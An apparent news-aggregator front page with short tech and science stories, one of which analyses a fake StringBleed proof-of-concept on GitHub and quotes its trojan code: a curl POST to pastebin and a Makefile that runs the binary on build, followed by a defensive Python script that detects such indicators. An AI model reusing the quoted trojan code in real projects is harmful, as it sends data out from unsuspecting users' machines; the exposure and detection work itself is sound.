
posted by martyb on Sunday April 30, @08:22PM
from the pleasure!=joy dept.

In 1985, Neil Postman observed an America imprisoned by its own need for amusement. He was, it turns out, extremely prescient.

[...] Many Americans get their news filtered through late-night comedy and their outrages filtered through Saturday Night Live. They—we—turn to memes to express both indignation and joy.

[...] Postman today is best remembered as a critic of television: That’s the medium he directly blamed, in Amusing Ourselves to Death, for what he termed Americans’ “vast descent into triviality,” and the technology he saw as both the cause and the outcome of a culture that privileged entertainment above all else. But Postman was a critic of more than TV alone. He mistrusted entertainment, not as a situation but as a political tool; he worried that Americans’ great capacity for distraction had compromised their ability to think, and to want, for themselves. He resented the tyranny of the lol. His great observation, and his great warning, was a newly relevant kind of bummer: There are dangers that can come with having too much fun.

In 1984, Americans took a look around at the world they had created for themselves and breathed a collective sigh of relief. The year George Orwell had appointed as the locus of his dark and only lightly fictionalized predictions—war, governmental manipulation, surveillance not just of actions, but of thoughts themselves—had brought with it, in reality, only the gentlest of dystopias. Sure, there was corporatism. Sure, there was communism. And yet, for most of the Americans living through that heady decade, 1984 had not, for all practical purposes, become Nineteen Eighty-Four. They surveyed themselves, and they congratulated themselves: They had escaped.

Or perhaps they hadn’t. Postman opened Amusing Ourselves to Death with a nod to the year that had preceded it. He talked about the freedoms enjoyed by the Americans of 1984—cultural, commercial, political. And then he broke the bad news: They’d been measuring themselves according to the wrong dystopia. It wasn’t Nineteen Eighty-Four that had the most to say about the America of the 1980s, but rather Aldous Huxley’s Brave New World. “In Huxley’s vision,” Postman noted, “no Big Brother is required to deprive people of their autonomy, maturity, and history.” Instead: “People will come to love their oppression, to adore the technologies that undo their capacities to think.”

The vehicle of their oppression, in this case? Yep, the television. Which had, Postman argued, thoroughly insinuated itself on all elements of American life—and not just in the boob-tubed, couch-potatoed, the-average-American-watches-five-hours-of-television-a-day kind of way that is so familiar in anti-TV invectives, but in a way that was decidedly more intimate.

https://www.theatlantic.com/entertainment/archive/2017/04/are-we-having-too-much-fun/523143/

Are we having tooooo much fun?


posted by martyb on Sunday April 30, @06:37PM
from the horrect-borse-stattery-caple dept.

Think passwords, people. Think long, complex passwords. Not because a breach dump's landed, but because the security-probing-oriented Kali Linux just got better at cracking passwords.

Kali is a Debian-based Linux that packs in numerous hacking and forensics tools. It's well-regarded among white hat hackers and investigators, who appreciate its inclusion of the tools of their trades.

The developers behind the distro this week gave it a polish, adding new images optimised for GPU-using instances in Azure and Amazon Web Services. The extra grunt the GPUs afford, Kali's backers say, will enhance the distribution's password-probing powers. There's also better support for GPU cracking, hence our warning at the top of this story: anyone can use Kali and there's no way to guarantee black hats won't press it into service. And they can now do so on as many GPU-boosted cloud instances as they fancy paying for.

Could some users of Kali Linux technically be called "thugs?"


posted by martyb on Sunday April 30, @04:52PM
from the pay-up-or-else dept.

DataBreaches.net notes:

"On December 26, in an encrypted chat, TheDarkOverlord (TDO) informed DataBreaches.net that they had recently come across what they described as hundreds of GBs of unreleased and non-public media from a studio located in Hollywood... TDO would not reveal the attack method nor how much the ransom demand was, but DataBreaches.net was able to obtain a copy of a contract both TDO and a representative of Larson allegedly signed. The contract, signed December 27, indicated that the studio would pay TDO 50 BTC by January 31. TDO signed the contract as "Adolf Hitler." The signature of the company representative was indecipherable, but TDO claimed that it was the CFO of the firm who signed."

https://www.databreaches.net/thedarkoverlord-leaks-upcoming-episode-of-orange-is-the-new-black-after-netflix-doesnt-pay-extortion-demand/

According to http://www.coindesk.com/price/, 50 BTC is US$65,984.32.

This article contains more of the contract content: https://noise.getoto.net/tag/thedarkoverlord/ as well as links to the pastebin (removed) https://web.archive.org/web/20170428224235/https://pastebin.com/FKZAafQd.

And covered by TorrentFreak https://torrentfreak.com/hackers-leak-netflixs-orange-is-the-new-black-season-5-premiere-170429/


posted by martyb on Sunday April 30, @03:07PM
from the we-can-find-no-longer-find-data-against-our-plans dept.

You were warned. Now it begins: The Chicago Tribune reports that the U.S. Environmental Protection Agency (EPA) is working on changes to its Web properties:

The EPA's extensive climate change website now redirects to a page that says "this page is being updated" and that "we are currently updating our website to reflect EPA's priorities under the leadership of President Trump and Administrator Pruitt." It also links to a full archive of how the page used to look on Jan. 19, before Trump's inauguration.


posted by martyb on Sunday April 30, @01:22PM
from the Ask-Soylent dept.

Recently, someone in my family was not able to get into their home PC with their password, and called for assistance. This means having to drive down to the machine to see what they are doing, and log in with the appropriate account that can reset that password. Work commitments preclude driving there right away to see what is happening, and I am trying to locate a remote access solution. If they were logged into the machine, I could use some sort of remote assistance tool, but that is not an option in this case. There is the possibility of setting up SSH or OpenVPN to access the machine via the Internet, but I am not certain leaving those tools running all the time is the smartest idea in this day and age.

What recommendations do the Soylent community have for securely managing a machine over the Internet when someone is not logged into it?


posted by martyb on Sunday April 30, @11:37AM
from the quis-custodiet-ipsos-custodes? dept.

In a Security Week article by Ionut Arghir about a newly discovered SNMP vulnerability which allows authentication mechanisms to be bypassed on dozens of network device models (more detail here and here), the author included a link to a github repository (https://github.com/string-bleed/StringBleed-CVE-2017-5135 -- Don't compile and execute the code, but by all means take a look) which purports to be a proof-of-concept (POC) exploit of the vulnerability. However, it's not. It's a trojan which will exfiltrate data from your system.

From the Security Week article:

The issue, the researchers say [this is the link to the trojaned "POC"], resides in the manner in which the SNMP agent in different devices (usually cable modems) handles a human-readable string datatype value called "community string" that SNMP version 1 and 2 use.

The folks at Mitre (who manage the CVE database) caught this and make mention of the issue in their DB entry:

Certain Technicolor devices have an SNMP access-control bypass, possibly involving an ISP customization in some cases. The Technicolor (formerly Cisco) DPC3928SL with firmware D3928SL-P15-13-A386-c3420r55105-160127a could be reached by any SNMP community string from the Internet; also, you can write in the MIB because it provides write properties, aka Stringbleed. NOTE: the string-bleed/StringBleed-CVE-2017-5135 GitHub repository is not a valid reference as of 2017-04-27; it contains Trojan horse code purported to exploit this vulnerability.

The github repository contains a license, a readme, a Makefile and one source file, poc-linux.c. Looking at the C code, it's immediately clear that this is *not* an SNMP exploit (extracts from poc-linux.c):

void make_http_body()
{
    system("curl -X POST https://pastebin.com/api/api_post.php --data 'api_option=paste&api_paste_name=dotslashhacker&api_paste_expire_date=10M&api_paste_format=c&api_paste_private=0&api_dev_key=8fc2bb602e03acd0c45830805b878497&api_paste_code=i%20randomly%20run%20PoC%20exploits%20without%20checking%20them%20first%20'");

    printf("\n\n:)\n\n");
}

int make_packet(char *_packet, char *_fname, int *_body_len)
{
    int header_len;
    int packet_len;
    char *body_line = calloc(sizeof(char), DATA_SIZE);
    char *header_line = calloc(sizeof(char), DATA_SIZE);
    make_http_body();
    return 123;
}

[...]

int main(int argc, char* argv[])
{
    int i;
    int packet_len;
    int sock;
    int body_len;
    char *packet = calloc(sizeof(char), DATA_SIZE);

    char *f_name = '/etc/snmp';
    sock = socket_connect("104.20.209.21", 80);
    packet_len = make_packet(packet,f_name, &body_len);
    return 0;
}

What's more, the Makefile executes the binary immediately upon compiling/linking:

all: poclinux

poclinux:
        gcc -Qunused-arguments -std=gnu99 poc-linux.c -o poc-linux
        chmod +x poc-linux && ./poc-linux

I'm wondering why Mr. Arghir over at Security Week didn't do his due diligence (and it didn't take much, just opening the C file, or even just looking at the CVE entry at Mitre.org).

I know it goes against much of what Soylentils stand for, but TFA is a short read. Based on TFA, would any of you have simply gone to github and built this "POC" without making sure it was what it purported to be?

Also, is anyone actually still using SNMP v1/2/2c, rather than v3?

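As an added example (not code from the submission or from the repository it discusses), here is a small Python triage script of the kind that would have caught this "POC" before anyone built it: it flags the indicators visible in the quoted extracts, namely a shell-out to curl, a pastebin upload, a hard-coded remote IP, and a Makefile recipe that runs the binary it has just compiled. The indicator list, function names and the cut-down sample inputs are my own constructions based on the extracts above.

```python
import re

# Indicators an "SNMP PoC" source file has no reason to contain.
SOURCE_INDICATORS = {
    "shell_exec": re.compile(r"\b(system|popen|execl|execv)\s*\("),
    "http_upload": re.compile(r"\bcurl\b.*-X\s*POST"),
    "paste_site": re.compile(r"pastebin\.com"),
    "hardcoded_ip": re.compile(r'"(\d{1,3}(?:\.\d{1,3}){3})"'),
}

# A recipe line that executes ./NAME, either on its own or chained after &&.
RUN_BINARY = re.compile(r"(?:^\s*|&&\s*)\./(\S+)")


def scan_c_source(text):
    """Map each indicator name to the 1-based line numbers where it appears."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in SOURCE_INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def scan_makefile(text):
    """Return recipe lines that run a binary this same Makefile builds (-o NAME ... ./NAME)."""
    built = set(re.findall(r"-o\s+(\S+)", text))
    flagged = []
    for line in text.splitlines():
        match = RUN_BINARY.search(line)
        if match and match.group(1) in built:
            flagged.append(line.strip())
    return flagged


def triage(c_text, makefile_text):
    """Return (safe_to_build, findings); any finding means read it, do not run it."""
    findings = [f"{name}: line(s) {lines}"
                for name, lines in sorted(scan_c_source(c_text).items())]
    findings += [f"Makefile runs its own build product: {line}"
                 for line in scan_makefile(makefile_text)]
    return not findings, findings


# Constructed sample inputs, cut down from the extracts quoted above.
SAMPLE_C = (
    "void make_http_body()\n"
    "{\n"
    '    system("curl -X POST https://pastebin.com/api/api_post.php --data ...");\n'
    "}\n"
    "int main(int argc, char *argv[])\n"
    "{\n"
    '    sock = socket_connect("104.20.209.21", 80);\n'
    "    return 0;\n"
    "}\n"
)
SAMPLE_MAKEFILE = ("all: poclinux\n\npoclinux:\n"
                   "\tgcc -std=gnu99 poc-linux.c -o poc-linux\n"
                   "\tchmod +x poc-linux && ./poc-linux\n")

if __name__ == "__main__":
    safe, findings = triage(SAMPLE_C, SAMPLE_MAKEFILE)
    print("safe to build" if safe else "DO NOT BUILD:\n  " + "\n  ".join(findings))
```

Run against the real repository contents, the same four source indicators and the build-and-run recipe line are what the script would report.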

posted by charon on Sunday April 30, @09:41AM
from the crossing-my-fingers-against-Auteur-Existence-Failure dept.

Who asked for a bunch of "Avatar" sequels for Christmas? Your wish has been granted.

Better find out what the Na'vi want for Christmas, because the blue humanoids are going to be around for a lot of them.

The official Facebook page for James Cameron's sci-fi movie franchise announced on Saturday that dates have been set for the release of the next four "Avatar" sequels, and they're all right around the big December holiday movie rush, though in different years.

"Avatar takes flight as we begin concurrent production on four sequels," the post reads. "The journey continues December 18, 2020, December 17, 2021, December 20, 2024 and December 19, 2025!"

-- submitted from IRC


posted by charon on Sunday April 30, @07:47AM
from the still-pretty-loud dept.

http://www.npr.org/sections/thetwo-way/2017/04/26/525609671/recordings-reveal-baby-humpback-whales-whisper-to-their-mothers

Baby humpback whales seem to whisper to their mothers, according to scientists who have captured the infant whales' quiet grunts and squeaks.

The recordings, described in the journal Functional Ecology, are the first ever made with devices attached directly to the calves.

High suckling rates and acoustic crypsis of humpback whale neonates maximise potential for mother–calf energy transfer (open, DOI: 10.1111/1365-2435.12871) (DX)


posted by martyb on Sunday April 30, @05:48AM

SpaceX will attempt to launch a spy satellite for the first time on Sunday, breaking a 10-year United Launch Alliance monopoly on classified U.S. launches.

The two-hour launch window opens at 7:00 a.m. EDT (11:00 UTC), with a backup launch window the next day at the same time. SpaceX will attempt to recover the first stage rocket.

Also at NASASpaceFlight and The Verge. Falcon Heavy test firing begins soon.

[UPDATE 1: The launch is being live-streamed on YouTube. --martyb]

[UPDATE 2: Launch was scrubbed at T minus 1 minute due to "a sensor issue on the first stage" — launch now scheduled for same time tomorrow: Monday, May 1, 2017 at 0700 EDT / 1100 UTC. --martyb]


posted by charon on Sunday April 30, @04:18AM
from the or-not dept.

Submitted via IRC for TheMightyBuzzard

With slick marketing, catchy taglines and some pretty bold claims about their security, nomx claim to have cracked email security.

This thorough article tells all about the device, and it doesn't measure up at all to its marketing.

It would be very easy to conclude that this is a scam. The device is running standard mail server software running on a Raspberry Pi, most of which is outdated. They have presented at countless tech shows and can be constantly found making bold statements of 'absolute security' yet didn't pick up a CSRF vulnerability in their web interface.

Source: https://scotthelme.co.uk/nomx-the-worlds-most-secure-communications-protocol/

Nomx has issued a reply on their main page in a post titled 'nomx Passes Security Tests After Blogger Claims to Have Penetrated nomx'. In that reply nomx states the following results:

No nomx user was affected by this threat. No nomx user could be affected by this threat in the future. No nomx data was compromised, and the blogger has (finally) reluctantly verified this. He still has not publicly shared these statements, except via an email response to the BBC when directly asked on April 25 the response was:

From the BBC to nomx: "I understand from your replies that you state categorically that no nomx accounts have been affected by this hack. I have put your questions to [blogger] who has confirmed to me that he cannot say that any have."

While nomx is no longer based on Raspberry devices, we still maintain that the users' data is secured as we've demonstrated to the blogger, the media and our customers.

Also at Ars Technica


posted by cmn32480 on Sunday April 30, @02:19AM
from the there-is-a-backlog dept.

It's reported that, as of 11 April, patches are available for a security bug in Microsoft Office and in Wordpad which was disclosed to the company in October. The flaw was widely exploited after McAfee blogged about it. It affects Microsoft Office 2007 SP3 and Windows Vista SP2; the latter was released in May 2009 and the former in October 2011.

In related news, The Register (non-Cloudflare link) says that

[...] CVE-2017-0210 in Internet Explorer, and CVE-2017-2605 in Office – are being actively attacked in the wild by miscreants and the Dridex malware. That latter bug has no patch, by the way: Microsoft just switched off an exploited PostScript filter by default.

Further information: CVE-2017-0199

Coverage:

Related story:
After Microsoft Delays Patch Tuesday, Google Discloses Windows Bug


posted by cmn32480 on Sunday April 30, @12:41AM
from the does-he-have-a-wingman? dept.

An extremely cold and relatively small exoplanet has been discovered using gravitational microlensing. The planet orbits an ultracool red or brown dwarf at a distance of around 1.16 AU:

Scientists have discovered a new planet with the mass of Earth, orbiting its star at the same distance that we orbit our sun. The planet is likely far too cold to be habitable for life as we know it, however, because its star is so faint. But the discovery adds to scientists' understanding of the types of planetary systems that exist beyond our own.

[...] The newly discovered planet, called OGLE-2016-BLG-1195Lb, aids scientists in their quest to figure out the distribution of planets in our galaxy. An open question is whether there is a difference in the frequency of planets in the Milky Way's central bulge compared to its disk, the pancake-like region surrounding the bulge. OGLE-2016-BLG-1195Lb is located in the disk, as are two planets previously detected through microlensing by NASA's Spitzer Space Telescope.

Popsci press couldn't resist calling it "Hoth", although it would be even less hospitable.

Also at CNN and Scientific American (Space.com).

An Earth-mass Planet in a 1 au Orbit around an Ultracool Dwarf (open, DOI: 10.3847/2041-8213/aa6d09) (DX)


posted by takyon on Saturday April 29, @11:14PM
from the flatlander-handheld dept.

Kotaku reports that:

[...] Nintendo announced the New 2DS XL, a sleek $150 piece of hardware that is essentially a New 3DS XL without 3D. This is an iteration on 2013's 2DS, a cheaper model that also ditched the 3D but felt uncomfortable and lacked the convenient clamshell design of other models.

The new model is planned to be available in July in the United States, at around $150.

takyon: Is glasses-free 3D dead?

Nintendo 3DS was released in Japan on February 26, 2011 and worldwide the following month. The price was cut by $80 on July 28, 2011.


posted by martyb on Saturday April 29, @09:38PM
from the download-it-now dept.

Softpedia News reports that version 2.02 of the GRUB boot loader has been released. Among the many new features are support for LZ4 compression on ZFS, 64-bit ext2, XFS v5, Morse code output and a modem-like output through the PC speaker, Xen paravirtualisation, TrueCrypt ISOs, Apple fat binaries on non-Apple hardware, and 16-bit mode on non-x86 hardware.

Further information:
NEWS file

Related stories:
Windows 8 Update Erases Grub, Enables Secure Boot
Press Backspace 28 times: Pwn Unlucky Linux Systems Running GRUB


posted by martyb on Saturday April 29, @08:05PM
from the do-no-harm dept.

http://www.sciencemag.org/news/2017/04/10-million-settlement-over-alleged-misconduct-boston-heart-stem-cell-lab

A research misconduct investigation of a prominent stem cell lab by the Harvard University–affiliated Brigham and Women's Hospital (BWH) in Boston has led to a massive settlement with the U.S. government over allegations of fraudulently obtained federal grants. As Retraction Watch reports, BWH and its parent health care system have agreed to pay $10 million to resolve allegations that former BWH cardiac stem cell scientist Piero Anversa and former lab members Annarosa Leri and Jan Kajstura relied on manipulated and fabricated data in grant applications submitted to the U.S. National Institutes of Health (NIH).

A statement from the U.S. Attorney's Office for the District of Massachusetts released today notes that it was BWH itself that shared the allegations against Anversa's lab with the government. The hospital had been conducting its own probe into the Anversa lab since at least 2014, when a retraction published in the journal Circulation revealed the ongoing investigation. The hospital has not yet released any findings.
